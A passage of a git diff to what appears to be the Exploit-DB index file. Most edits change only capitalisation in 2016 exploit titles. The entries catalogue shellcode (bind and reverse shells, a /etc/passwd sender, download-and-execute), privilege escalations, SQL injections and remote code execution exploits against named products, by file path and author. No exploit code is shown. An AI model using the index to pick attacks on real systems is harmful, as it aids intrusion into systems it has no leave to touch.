Research",osx,dos,0 -39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 +39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 39616,platforms/osx/dos/39616.c,"OS X Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 -39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 -39623,platforms/php/webapps/39623.txt,"WordPress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 -39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 -39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 +39623,platforms/php/webapps/39623.txt,"Wordpress Photocart Link Plugin 1.6 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 +39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86-64 - execve(/bin/bash) Shellcode (33 bytes)",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 39629,platforms/android/dos/39629.txt,"Android One - mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 @@ -35859,7 +35859,7 @@ id,file,description,date,author,platform,type,port 39643,platforms/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload",2016-03-31,Metasploit,java,remote,8080 39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 -39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 +39646,platforms/php/webapps/39646.py,"Wordpress Advanced Video Plugin 1.0 - Local File Inclusion",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 @@ -35892,7 +35892,7 @@ id,file,description,date,author,platform,type,port 39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947 39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80 39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80 -39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 +39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0 39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0 39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0 39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0 @@ -35906,12 +35906,12 @@ id,file,description,date,author,platform,type,port 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80 39698,platforms/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0 -39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 +39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation",2016-04-15,Metasploit,linux,local,0 39967,platforms/linux/local/39967.txt,"Solarwinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0 -39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 -39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 +39704,platforms/php/webapps/39704.txt,"Wordpress leenk.me Plugin 2.5.0 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 +39705,platforms/php/webapps/39705.txt,"Wordpress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80 @@ -35923,13 +35923,13 @@ id,file,description,date,author,platform,type,port 39714,platforms/php/webapps/39714.txt,"phpLiteAdmin 1.9.6 - Multiple Vulnerabilities",2016-04-21,"Ozer Goker",php,webapps,80 39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 -39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 +39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 -39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 +39723,platforms/lin_x86/shellcode/39723.c,"Linux/x86 - Bind TCP Port 1472 (IPv6) Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39725,platforms/hardware/webapps/39725.rb,"Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 @@ -35945,7 +35945,7 @@ id,file,description,date,author,platform,type,port 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0 39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 -39741,platforms/osx/local/39741.txt,"Mach Race OS X - Privilege Escalation",2016-04-27,fG!,osx,local,0 +39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross-Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 @@ -35956,17 +35956,17 @@ id,file,description,date,author,platform,type,port 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80 -39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 +39752,platforms/php/webapps/39752.txt,"Wordpress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80 39754,platforms/win_x86/shellcode/39754.txt,"Win32 .Net Framework - Execute Native x86 Shellcode",2016-05-02,Jacky5112,win_x86,shellcode,0 39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0 39756,platforms/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution",2016-05-02,Metasploit,linux,remote,8080 39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,android,local,0 -39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39758,platforms/lin_x86-64/shellcode/39758.c,"Linux/x86-64 - Bind 1472/TCP Shellcode (IPv6) (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39759,platforms/php/webapps/39759.txt,"Alibaba Clone B2B Script - Admin Authentication Bypass",2016-05-04,"Meisam Monsef",php,webapps,80 39760,platforms/php/webapps/39760.txt,"CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning",2016-05-04,"Mickaël Walter",php,webapps,80 39761,platforms/php/webapps/39761.txt,"Acunetix WP Security Plugin 3.0.3 - Cross-Site Scripting",2016-05-04,"Johto Robbie",php,webapps,80 39762,platforms/cgi/webapps/39762.txt,"NetCommWireless HSPA 3G10WVE Wireless Router - Multiple Vulnerabilities",2016-05-04,"Bhadresh Patel",cgi,webapps,80 -39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 +39763,platforms/lin_x86-64/shellcode/39763.c,"Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 @@ -35986,7 +35986,7 @@ id,file,description,date,author,platform,type,port 39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443 39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80 39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,dos,0 -39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 +39783,platforms/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80 39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 @@ -36007,17 +36007,17 @@ id,file,description,date,author,platform,type,port 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 -39806,platforms/php/webapps/39806.txt,"WordPress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 -39807,platforms/php/webapps/39807.txt,"WordPress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 +39806,platforms/php/webapps/39806.txt,"Wordpress Q and A (Focus Plus) FAQ Plugin 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 +39807,platforms/php/webapps/39807.txt,"Wordpress Huge-IT Image Gallery Plugin 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 -39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 +39883,platforms/php/webapps/39883.txt,"Wordpress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 39813,platforms/php/webapps/39813.txt,"CakePHP Framework 3.2.4 - IP Spoofing",2016-05-16,"Dawid Golunski",php,webapps,80 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0 -39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 +39815,platforms/lin_x86/shellcode/39815.c,"Linux/x86 - Bindshell with Configurable Port Shellcode (87 bytes)",2016-05-16,JollyFrogs,lin_x86,shellcode,0 39816,platforms/php/webapps/39816.php,"eXtplorer 2.1.9 - Archive Path Traversal",2016-05-16,hyp3rlinx,php,webapps,0 39817,platforms/php/webapps/39817.php,"Web interface for DNSmasq / Mikrotik - SQL Injection",2016-05-16,hyp3rlinx,php,webapps,0 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash PoC (2)",2016-05-16,HauntIT,windows,dos,0 @@ -36051,7 +36051,7 @@ id,file,description,date,author,platform,type,port 39848,platforms/php/webapps/39848.py,"Job Script by Scubez - Remote Code Execution",2016-05-23,"Bikramaditya Guha",php,webapps,80 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure (via XXE Injection)",2016-05-24,"Mehmet Ince",asp,webapps,80 -39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 +39851,platforms/lin_x86/shellcode/39851.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,Metasploit,java,remote,8088 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS - Arbitrary File Upload",2016-05-25,Metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 @@ -36089,12 +36089,12 @@ id,file,description,date,author,platform,type,port 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 -39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 -39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,php,webapps,80 -39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 -39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 -39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 -39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 +39891,platforms/php/webapps/39891.txt,"Wordpress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 +39892,platforms/php/webapps/39892.php,"Wordpress Creative Multi-Purpose Theme 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,php,webapps,80 +39893,platforms/php/webapps/39893.php,"Wordpress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 +39894,platforms/php/webapps/39894.php,"Wordpress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 +39895,platforms/php/webapps/39895.php,"Wordpress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 +39896,platforms/php/webapps/39896.txt,"Wordpress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80 39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80 39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80 @@ -36144,7 +36144,7 @@ id,file,description,date,author,platform,type,port 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution",2016-06-14,Metasploit,linux,remote,8080 -39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 +39946,platforms/php/webapps/39946.php,"Wordpress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0 39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80 39949,platforms/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - Cross-Site Request Forgery (Send Message)",2016-06-15,HaHwul,php,webapps,80 @@ -36163,12 +36163,12 @@ id,file,description,date,author,platform,type,port 39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80 39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 -39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 +39969,platforms/php/webapps/39969.php,"Wordpress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443 -39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 +39974,platforms/php/webapps/39974.html,"Wordpress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 @@ -36201,7 +36201,7 @@ id,file,description,date,author,platform,type,port 40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80 40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) Cross-Site Request Forgery",2016-06-23,HaHwul,php,webapps,80 40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80 -40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80 +40012,platforms/php/webapps/40012.txt,"Wordpress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80 40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0 40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Persistent Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80 @@ -36219,7 +36219,7 @@ id,file,description,date,author,platform,type,port 40027,platforms/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",php,webapps,80 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 -40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80 +40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80 40031,platforms/multiple/dos/40031.txt,"Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0 40032,platforms/multiple/dos/40032.txt,"Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0 40034,platforms/multiple/dos/40034.txt,"Symantec Antivirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 @@ -36230,7 +36230,7 @@ id,file,description,date,author,platform,type,port 40039,platforms/win_x86/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0 40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code 